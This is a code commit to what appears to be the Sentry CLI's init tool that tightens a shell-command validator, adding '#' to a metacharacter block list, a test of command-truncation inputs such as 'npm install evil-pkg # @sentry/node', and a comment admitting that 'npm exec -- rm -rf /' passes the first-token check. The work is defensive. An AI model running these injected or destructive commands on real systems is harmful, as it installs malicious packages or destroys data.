fix(init): address PR review comments — block # metachar, document first-token limitation, unexport FEATURE_INFO

- Add `#` to shell metacharacter blocklist to prevent command truncation
  (e.g. `npm install evil-pkg # @sentry/node`)
- Document Layer 3's first-token-only limitation with explanatory comment
- Remove unnecessary `export` from `FEATURE_INFO` in clack-utils.ts
- Add test for shell comment character blocking

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

Author: betegon

src/lib/init/clack-utils.ts

@@ -22,7 +22,7 @@ export function abortIfCancelled<T>(value: T | symbol): T {
   return value as T;
 }
 
-export const FEATURE_INFO: Record<string, { label: string; hint: string }> = {
+const FEATURE_INFO: Record<string, { label: string; hint: string }> = {
   errorMonitoring: {
     label: "Error Monitoring",
     hint: "Automatic error and crash reporting",

src/lib/init/local-ops.ts

@@ -59,6 +59,7 @@ const SHELL_METACHARACTER_PATTERNS: Array<{ pattern: string; label: string }> =
     { pattern: "}", label: "brace expansion (})" },
     { pattern: "*", label: "glob expansion (*)" },
     { pattern: "?", label: "glob expansion (?)" },
+    { pattern: "#", label: "shell comment (#)" },
   ];
 
 const WHITESPACE_RE = /\s+/;
@@ -141,7 +142,12 @@ export function validateCommand(command: string): string | undefined {
     return `Blocked command: contains environment variable assignment — "${command}"`;
   }
 
-  // Layer 3: Block dangerous executables
+  // Layer 3: Block dangerous executables (first token only).
+  // NOTE: This only checks the primary executable (e.g. "npm"), not
+  // subcommands. A command like "npm exec -- rm -rf /" passes because
+  // "npm" is the first token. Comprehensive subcommand parsing across
+  // package managers is not implemented — commands originate from the
+  // Sentry API server, and Layer 1 already blocks most injection patterns.
   const executable = path.basename(firstToken);
   if (BLOCKED_EXECUTABLES.has(executable)) {
     return `Blocked command: disallowed executable "${executable}" — "${command}"`;

test/lib/init/local-ops.test.ts

@@ -97,6 +97,15 @@ describe("validateCommand", () => {
     }
   });
 
+  test("blocks shell comment character to prevent command truncation", () => {
+    for (const cmd of [
+      "npm install evil-pkg # @sentry/node",
+      "npm install evil-pkg#benign",
+    ]) {
+      expect(validateCommand(cmd)).toContain("Blocked command");
+    }
+  });
+
   test("blocks environment variable injection in first token", () => {
     for (const cmd of [
       "npm_config_registry=http://evil.com npm install @sentry/node",